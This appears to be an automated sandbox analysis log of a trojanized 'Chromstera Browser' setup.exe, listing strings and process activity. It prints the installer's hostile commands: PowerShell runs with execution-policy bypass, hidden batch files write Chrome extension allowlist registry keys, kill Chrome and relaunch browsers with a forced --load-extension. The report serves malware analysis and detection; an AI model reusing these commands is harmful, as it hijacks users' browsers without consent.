                      Source: setup.exe, 00000000.00000002.2952945604.00000000067F0000.00000002.00000001.00040000.00000012.sdmpBinary or memory string: OriginalFilenameviewer.exeF vs setup.exe
                      Source: setup.exe, 00000000.00000002.2952945604.00000000067F0000.00000002.00000001.00040000.00000012.sdmpBinary or memory string: OriginalFilenameMsiTempFiles.dllF vs setup.exe
                      Source: setup.exe, 00000000.00000002.2952945604.00000000067F0000.00000002.00000001.00040000.00000012.sdmpBinary or memory string: OriginalFilenamelzmaextractor.dllF vs setup.exe
                      Source: setup.exe, 00000000.00000002.2952945604.00000000067F0000.00000002.00000001.00040000.00000012.sdmpBinary or memory string: OriginalFilenameAICustAct.dllF vs setup.exe
                      Source: setup.exe, 00000000.00000002.2949640142.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFileNameChromnius-Main.exeF vs setup.exe
                      Source: setup.exe, 00000000.00000002.2952714019.000000000628A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFileNameChromnius- vs setup.exe
                      Source: setup.exe, 00000003.00000002.2951398540.0000000004B90000.00000002.00000001.00040000.00000012.sdmpBinary or memory string: OriginalFilenameviewer.exeF vs setup.exe
                      Source: setup.exe, 00000003.00000002.2951398540.0000000004B90000.00000002.00000001.00040000.00000012.sdmpBinary or memory string: OriginalFilenameMsiTempFiles.dllF vs setup.exe
                      Source: setup.exe, 00000003.00000002.2951398540.0000000004B90000.00000002.00000001.00040000.00000012.sdmpBinary or memory string: OriginalFilenamelzmaextractor.dllF vs setup.exe
                      Source: setup.exe, 00000003.00000002.2951398540.0000000004B90000.00000002.00000001.00040000.00000012.sdmpBinary or memory string: OriginalFilenameAICustAct.dllF vs setup.exe
                      Source: setup.exe, 00000003.00000002.2951398540.0000000004EB7000.00000002.00000001.00040000.00000012.sdmpBinary or memory string: OriginalFilenameSoftwareDetector.dllF vs setup.exe
                      Source: setup.exe, 00000003.00000002.2951398540.0000000004EB7000.00000002.00000001.00040000.00000012.sdmpBinary or memory string: OriginalFilenameaischeduler.dllF vs setup.exe
                      Source: setup.exe, 00000003.00000002.2951398540.0000000004EB7000.00000002.00000001.00040000.00000012.sdmpBinary or memory string: OriginalFilenamePrereq.dllF vs setup.exe
                      Source: setup.exe, 00000003.00000002.2951398540.0000000004EB7000.00000002.00000001.00040000.00000012.sdmpBinary or memory string: OriginalFilenamePowerShellScriptLauncher.dllF vs setup.exe
                      Source: setup.exe, 00000003.00000000.1739888347.0000000000EAA000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFileNameChromnius-Main.exeF vs setup.exe
                      Source: setup.exe, 00000003.00000003.1746421738.00000000039F2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamewininet.dllD vs setup.exe
                      Source: setup.exeBinary or memory string: OriginalFileNameChromnius-Main.exeF vs setup.exe
                      Source: setup.exeBinary or memory string: OriginalFilenameviewer.exeF vs setup.exe
                      Source: setup.exeBinary or memory string: OriginalFilenameMsiTempFiles.dllF vs setup.exe
                      Source: setup.exeBinary or memory string: OriginalFilenamelzmaextractor.dllF vs setup.exe
                      Source: setup.exeBinary or memory string: OriginalFilenameAICustAct.dllF vs setup.exe
                      Source: setup.exeBinary or memory string: OriginalFilenameSoftwareDetector.dllF vs setup.exe
                      Source: setup.exeBinary or memory string: OriginalFilenameaischeduler.dllF vs setup.exe
                      Source: setup.exeBinary or memory string: OriginalFilenamePrereq.dllF vs setup.exe
                      Source: setup.exeBinary or memory string: OriginalFilenamePowerShellScriptLauncher.dllF vs setup.exe
                      Source: setup.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG ADD "\Policies\Google\Chrome\ExtensionInstallAllowlist" /v "1" /t REG_SZ /d /f
                      Source: shi3105.tmp.0.drBinary string: \Device\NameResTrk\RecordNrtCloneOpenPacket
                      Source: classification engineClassification label: mal81.troj.evad.winEXE@150/138@11/5
                      Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00CCEF90 FormatMessageW,GetLastError,0_2_00CCEF90
                      Source: C:\Program Files (x86)\Chromstera Browser\ChromsteraUpdater.exeCode function: 8_2_00147B20 CreateToolhelp32Snapshot,Process32FirstW,OpenProcess,QueryFullProcessImageNameW,CloseHandle,Process32NextW,CloseHandle,GetWindowThreadProcessId,GetWindowTextW,GetWindowLongW,GetWindowLongW,GetWindowLongW,GetWindowLongW,8_2_00147B20
                      Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00D16E40 CoCreateInstance,0_2_00D16E40
                      Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00BAA160 LoadResource,LockResource,SizeofResource,0_2_00BAA160
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Chromstera BrowserJump to behavior
                      Source: C:\Users\user\Desktop\setup.exeFile created: C:\Users\user\AppData\Roaming\Chromstera SolutionsJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7972:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7848:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5000:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6504:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2120:120:WilError_03
                      Source: C:\Users\user\Desktop\setup.exeFile created: C:\Users\user\AppData\Local\Temp\shi3105.tmpJump to behavior
                      Source: C:\Windows\Installer\MSI4739.tmpProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C ""C:\Users\user\AppData\Local\Temp\chrome.bat" "
                      Source: setup.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: C:\Users\user\Desktop\setup.exeFile read: C:\Users\desktop.iniJump to behavior
                      Source: C:\Users\user\Desktop\setup.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: setup.exeReversingLabs: Detection: 41%
                      Source: ChromsteraUpdater.exeString found in binary or memory: -startminimized
                      Source: ChromsteraUpdater.exeString found in binary or memory: /install
                      Source: ChromsteraUpdater.exeString found in binary or memory: -startappfirst
                      Source: ChromsteraUpdater.exeString found in binary or memory: -installready
                      Source: ChromsteraUpdater.exeString found in binary or memory: /installservice
                      Source: setup.exeString found in binary or memory: ComboBoxListBoxListViewINSERT INTO `` (`Property`, `Order`, `Value`, `Text`,`Binary_`) VALUES (?,?,?,?,?) TEMPORARY` (`Property`, `Order`, `Value`, `Text`) VALUES (?,?,?,?) TEMPORARYSELECT * FROM `%s` WHERE `Property`='%s' AND `Value`='%s'SELECT * FROM `%s` WHERE `Property`='%s'EditSELECT `Message` FROM `Error` WHERE `Error` = %sSELECT `Text` FROM `UIText` WHERE `Key` = '%s'tmpALLUSERS = 1ALLUSERS = 2MSIINSTALLPERUSER = 1AI_PACKAGE_TYPE = "x64"AI_PACKAGE_TYPE = "Intel64"SELECT * FROM `Control` WHERE `Dialog_` = '%s' AND `Control` = '%s'SELECT `Attributes` FROM `Control` WHERE `Dialog_` = '%s' AND `Control` = '%s'$=3WS_BORDERWS_CAPTIONWS_CHILDWS_CHILDWINDOWWS_CLIPCHILDRENWS_CLIPSIBLINGSWS_DISABLEDWS_DLGFRAMEWS_GROUPWS_HSCROLLWS_ICONICWS_SIZEBOXWS_SYSMENUWS_TABSTOPWS_THICKFRAMEWS_VISIBLEWS_VSCROLLWS_MAXIMIZEBOXWS_MAXIMIZEWS_MINIMIZEBOXWS_MINIMIZEWS_OVERLAPPEDWINDOWWS_OVERLAPPEDWS_POPUPWINDOWWS_POPUPWS_TILEDWINDOWWS_TILEDWS_EX_ACCEPTFILESWS_EX_APPWINDOWWS_EX_CLIENTEDGEWS_EX_CONTEXTHELPWS_EX_CONTROLPARENTWS_EX_DLGMODALFRAMEWS_EX_LEFTWS_EX_LEFTSCROLLBARWS_EX_LTRREADINGWS_EX_MDICHILDWS_EX_NOPARENTNOTIFYWS_EX_OVERLAPPEDWINDOWWS_EX_PALETTEWINDOWWS_EX_RTLREADINGWS_EX_STATICEDGEWS_EX_TOOLWINDOWWS_EX_TOPMOSTWS_EX_TRANSPARENTWS_EX_WINDOWEDGEWS_EX_RIGHTSCROLLBARWS_EX_RIGHTWS_EX_LAYEREDWS_EX_NOACTIVATEWS_EX_NOINHERITLAYOUTWS_EX_LAYOUTRTLWS_EX_COMPOSITEDWS_EXAI_TRIAL_MESSAGE_BODYAI_MSM_TRIAL_MESSAGE_BODYAI_APP_FILEAI_README_FILEAI_APP_ARGSAI_RUN_AS_ADMINMsiLogFileLocation[ProgramFilesFolder][LocalAppDataFolder]Programs\[ProgramFiles64Folder][CommonFilesFolder][LocalAppDataFolder]Programs\Common\[CommonFiles64Folder][WindowsFolder][LocalAppDataFolder][SystemFolder][WindowsVolume][ProgramMenuFolder][DesktopFolder][StartupFolder][TemplateFolder][AdminToolsFolder][AI_UserProgramFiles][WindowsVolume]Program Files (x86)\[AI_ProgramFiles][WindowsVolume]Program Files\MIGRATEFindRelatedProductsMigrateFeatureStatesAI_SETMIXINSTLOCATIONAPPDIRAI_RESTORE_LOCATIONSELECT `ActionProperty` FROM `Upgrade`ActionTarget`Action`='SET_APPDIR' OR `Action`='SET_SHORTCUTDIR'CustomActionSET_APPDIRSET_SHORTCUTDIRSHORTCUTDIRProgramMenuFolderAI_SH_INITEDBrowseDlgCancelDlgDiskCostDlgExitDialogMsiRMFilesInUseOutOfDiskDlgOutOfRbDiskDlgDialog_Control_(`Control_` = 'Next' OR `Control_` = 'Install') AND `Event` = 'EndDialog' AND `Argument` = 'Return'ControlEventAI_INSTALLPERUSER = "0"ALLUSERSVersionMsi >= "5.0"2MSIINSTALLPERUSERAI_NEWINSTProductLanguageAI_INTANCE_LOCATIONAI_UPGRADENoLanguageVersionStringInstallLocationAI_REPLACE_PRODUCTSAI_Replaced_Versions_ListAI_Upgrade_Replace_Question_YesBackUp_AI_Upgrade_Question_YesAI_Upgrade_Question_YesAI_Upgrade_Replace_Question_NoBackUp_AI_Upgrade_Question_NoAI_Upgrade_Question_NoYesDELETE FROM `Shortcut` WHERE `Shortcut`.`Directory_`='%s'DELETE FROM `IniFile` WHERE `IniFile`.`Section`='InternetShortcut' AND`IniFile`.`DirProperty`='%s'SELECT * FROM `%s`ShortcutIniFileAI_DESKTOP_SH0AI_STARTMENU_SHAI_STARTUP_SHAI_SHORTCUTSREGNot InstalledDesktopFolderSta
                      Source: setup.exeString found in binary or memory: $domain = "https://www.chromstera.com/installer/";
                      Source: setup.exeString found in binary or memory: Stop-Process -Name 'chrome';AI_DeleteCadLzmaDeleteLZMAFilesProcessTasksExtractLZMAFilesAI_DeleteRCadLzmaAI_PRESERVE_INSTALL_TYPEPreserveInstallTypeOnDetectSoftwareUpdateInstallModeAI_EnableDebugLogEnableDebugLogAI_DpiContentScaleDpiContentScaleSET_TARGETDIR_TO_APPDIRLaunchExeWithDirectory"[TempFolder]\browser.data" --system-levelScheduleTasksAI_ExtractCadLzmaDoEventsExtractSourceFilesAI_FindExeLzmaFindEXEAI_PREPARE_UPGRADEPrepareUpgradeAI_RESTORE_LOCATIONRestoreLocationAI_RESTORE_AI_SETUPEXEPATH[AI_SETUPEXEPATH_ORIGINAL]RemoveAllTempFilesDeleteTasksLaunchLogFileAI_STORE_LOCATIONARPINSTALLLOCATIONAI_UPDATER_UNINSTALL/clean silentUninstallTasksChrome/EnforcedRunAsAdmin /RunAsAdmin /HideWindow /dir "[TempFolder]" "[AI_CHROME.BAT]"Edge/EnforcedRunAsAdmin /RunAsAdmin /HideWindow /dir "[TempFolder]" "[AI_EDGE.BAT]"AI_SET_PATCHSET_APPDIR[ProgramFilesFolder]\[ProductName]SET_SHORTCUTDIRSHORTCUTDIR[ProgramMenuFolder][ProductName]AI_CORRECT_INSTALL{}AI_ADMINAI_SET_MAINTDetectModernWindowsAI_DETECT_WINTHEMEDetectWindowsThemeAI_DATA_SETTER_8[AI_Init_WelcomeDlg][ProductName] [Setup]Installer InformationCertSourceDirAPPDIR:.TempFolderTEMPFO~1|TempFolderWindowsVolumeWINDOW~1|WindowsVolumeAPPS-H~1|apps-helper{{Fatal error: }}{{Error [1]. }}Invalid CRC checksum value for [2] file.{ Its header says [3] for checksum, its computed value is [4].}The file '[2]' cannot be installed because the file cannot be found in cabinet file '[3]'. This could indicate a network error, an error reading from the CD-ROM, or a problem with this package.Warning [1]. Bad foreign key ('[2]') in '[3]' column of the '[4]' table.The installer has insufficient privileges to access this directory: [2]. The installation cannot continue. Log on as administrator or contact your system administrator.Info [1]. Could not enumerate subfolders for folder: [2].Action not found: [2].The installer has encountered an unexpected error installing this package. This may indicate a problem with this package. The error code is [1]. {{The arguments are: [2], [3], [4]}}You must restart your system for the configuration changes made to [2] to take effect. Click "Yes" to restart now or "No" if you plan to manually restart later.CreateNewDialog failed for the dialog [2].{{Disk full: }}Custom action [2] not found in Binary table stream.Changing the text font to [2] failed.Failed to correctly move [2] file: CRC error.Action [Time]: [1]. [2]Bad value in database. Table: '[2]'; Primary key: '[3]'; Column: '[4]'[ProductName]The file [2] is missing.{[2]}{, [3]}{, [4]}Configuration failed.Message type: [1], Argument: [2]Source file not found{{(cabinet)}}: [2]. Verify that the file exists and that you can access it.=== Logging started: [Date] [Time] ====== Logging stopped: [Date] [Time] ===An error occurred while writing installation information to disk. Check to make sure enough disk space is available, and click "Retry", or "Cancel" to end the install.Drive not ready: [2].Error reading from file [2]. {{ System err
                      Source: setup.exeString found in binary or memory: start "" "msedge" --profile-directory="Default" --no-startup-window --load-extension="%systemdrive%\apps-helper"
                      Source: setup.exeString found in binary or memory: start "" "msedge" --profile-directory="Default" --no-startup-window --load-extension="%systemdrive%\apps-helper"
                      Source: setup.exeString found in binary or memory: start "" "%chrome_exe%" --profile-directory="Default" --no-startup-window --load-extension="%systemdrive%\apps-helper"
                      Source: setup.exeString found in binary or memory: start "" "%chrome_exe%" --profile-directory="Default" --no-startup-window --load-extension="%systemdrive%\apps-helper"
                      Source: C:\Users\user\Desktop\setup.exeFile read: C:\Users\user\Desktop\setup.exeJump to behavior
                      Source: unknownProcess created: C:\Users\user\Desktop\setup.exe "C:\Users\user\Desktop\setup.exe"
                      Source: unknownProcess created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
                      Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding DD3B85FC1F11BB110F90DDDEF4702234 C
                      Source: C:\Users\user\Desktop\setup.exeProcess created: C:\Users\user\Desktop\setup.exe "C:\Users\user\Desktop\setup.exe" /i "C:\Users\user\AppData\Roaming\Chromstera Solutions\Chromstera Browser 1.0.0.0\install\Chromnius-Main.msi" AI_EUIMSI=1 APPDIR="C:\Program Files (x86)\Chromstera Browser" SECONDSEQUENCE="1" CLIENTPROCESSID="7404" AI_MORE_CMD_LINE=1
                      Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding C76E3ECFDACF14783EC0EC85D3ECBB2C
                      Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding CB2789DE8A953DFC6FBB92EF73C3F598 E Global\MSI0000
                      Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Windows\SystemTemp\pssD27E.ps1" -propFile "C:\Windows\SystemTemp\msiD25B.txt" -scriptFile "C:\Windows\SystemTemp\scrD25C.ps1" -scriptArgsFile "C:\Windows\SystemTemp\scrD25D.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue."
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: unknownProcess created: C:\Program Files (x86)\Chromstera Browser\ChromsteraUpdater.exe "C:\Program Files (x86)\Chromstera Browser\ChromsteraUpdater.exe"
                      Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pssED0B.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msiECF7.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scrECF8.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scrECF9.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue."
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pss1394.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msi1332.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scr1333.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scr1334.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue."
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\Installer\MSI4739.tmp "C:\Windows\Installer\MSI4739.tmp" /EnforcedRunAsAdmin /RunAsAdmin /HideWindow /dir "C:\Users\user\AppData\Local\Temp\" "C:\Users\user\AppData\Local\Temp\chrome.bat"
                      Source: C:\Windows\Installer\MSI4739.tmpProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C ""C:\Users\user\AppData\Local\Temp\chrome.bat" "
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG ADD "\Policies\Google\Chrome\ExtensionInstallAllowlist" /v "1" /t REG_SZ /d /f
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG ADD "\Google\Chrome\Extensions\" /v "path" /t REG_SZ /d /f
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG ADD "\Google\Chrome\Extensions\" /v "version" /t REG_SZ /d /f
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG ADD "\Policies\Google\Chrome\ExtensionInstallAllowlist" /v "1" /t REG_SZ /d /f
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG ADD "\Google\Chrome\Extensions\" /v "path" /t REG_SZ /d /f
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG ADD "\Google\Chrome\Extensions\" /v "version" /t REG_SZ /d /f
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --profile-directory="Default" --no-startup-window --load-extension="C:\apps-helper"
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout 2
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2060 --field-trial-handle=2012,i,10222868034098351333,13685129222229150854,262144 /prefetch:8
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout 2
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout 2
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout 2
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout 2
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout 2
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout 2
                      Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --no-startup-window /prefetch:5
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2064 --field-trial-handle=2012,i,17522224552689378138,6417613085102451852,262144 /prefetch:8
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout 2
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout 2
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout 2
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout 2
                      Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --no-startup-window /prefetch:5
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2044 --field-trial-handle=1992,i,14024855596687576691,10802708795507051728,262144 /prefetch:8
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout 2
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout 2
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout 2
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout 2
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout 2
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout 2
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout 2
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout 2
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout 5
                      Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\Installer\MSIFB77.tmp "C:\Windows\Installer\MSIFB77.tmp" /EnforcedRunAsAdmin /RunAsAdmin /HideWindow /dir "C:\Users\user\AppData\Local\Temp\" "C:\Users\user\AppData\Local\Temp\edge.bat"
                      Source: C:\Windows\Installer\MSIFB77.tmpProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C ""C:\Users\user\AppData\Local\Temp\edge.bat" "
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\setup.exeProcess created: C:\Users\user\Desktop\setup.exe "C:\Users\user\Desktop\setup.exe" /i "C:\Users\user\AppData\Roaming\Chromstera Solutions\Chromstera Browser 1.0.0.0\install\Chromnius-Main.msi" AI_EUIMSI=1 APPDIR="C:\Program Files (x86)\Chromstera Browser" SECONDSEQUENCE="1" CLIENTPROCESSID="7404" AI_MORE_CMD_LINE=1Jump to behavior
                      Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding DD3B85FC1F11BB110F90DDDEF4702234 CJump to behavior
                      Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding C76E3ECFDACF14783EC0EC85D3ECBB2CJump to behavior
                      Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding CB2789DE8A953DFC6FBB92EF73C3F598 E Global\MSI0000Jump to behavior
                      Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\Installer\MSI4739.tmp "C:\Windows\Installer\MSI4739.tmp" /EnforcedRunAsAdmin /RunAsAdmin /HideWindow /dir "C:\Users\user\AppData\Local\Temp\" "C:\Users\user\AppData\Local\Temp\chrome.bat"Jump to behavior
                      Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\Installer\MSIFB77.tmp "C:\Windows\Installer\MSIFB77.tmp" /EnforcedRunAsAdmin /RunAsAdmin /HideWindow /dir "C:\Users\user\AppData\Local\Temp\" "C:\Users\user\AppData\Local\Temp\edge.bat"Jump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pssED0B.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msiECF7.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scrECF8.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scrECF9.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue."Jump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pss1394.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msi1332.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scr1333.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scr1334.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue."Jump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Windows\SystemTemp\pssD27E.ps1" -propFile "C:\Windows\SystemTemp\msiD25B.txt" -scriptFile "C:\Windows\SystemTemp\scrD25C.ps1" -scriptArgsFile "C:\Windows\SystemTemp\scrD25D.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue."Jump to behavior
                      Source: C:\Windows\Installer\MSI4739.tmpProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C ""C:\Users\user\AppData\Local\Temp\chrome.bat" "
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG ADD "\Policies\Google\Chrome\ExtensionInstallAllowlist" /v "1" /t REG_SZ /d /f
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG ADD "\Google\Chrome\Extensions\" /v "path" /t REG_SZ /d /f
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG ADD "\Google\Chrome\Extensions\" /v "version" /t REG_SZ /d /f
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG ADD "\Policies\Google\Chrome\ExtensionInstallAllowlist" /v "1" /t REG_SZ /d /f
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG ADD "\Google\Chrome\Extensions\" /v "path" /t REG_SZ /d /f
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG ADD "\Google\Chrome\Extensions\" /v "version" /t REG_SZ /d /f
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --profile-directory="Default" --no-startup-window --load-extension="C:\apps-helper"
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout 2
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout 2
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout 2
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout 2
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout 2
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout 2
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout 2
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout 2
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout 2
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout 2
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout 2
